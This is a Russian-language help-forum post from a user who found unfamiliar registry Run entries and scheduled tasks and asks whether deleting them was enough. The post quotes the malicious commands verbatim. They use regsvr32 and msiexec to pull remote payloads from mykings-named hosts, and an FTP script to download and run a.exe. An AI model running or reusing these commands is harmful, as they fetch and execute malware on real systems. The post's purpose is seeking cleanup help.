Здравствуйте, у меня такая проблема: обнаружил в реестре в разделе Run две, отсутствующие до этого записи -
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i
http://js.mykings.top:280/helloworld.msi /q.
Кроме того в планировщике заданий появились несколько записей -
Mysa. Действие - Запуск программы. Подробности - /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe.
Mysa1
Mysa2
Mysa3
с перепугу удалил их, а потом у Вас на форуме нашел похожий случай.
Подскажите, пожалуйста, это всё или нужны еще какие-то действия ?
Прикрепил логи, собранные по инструкции.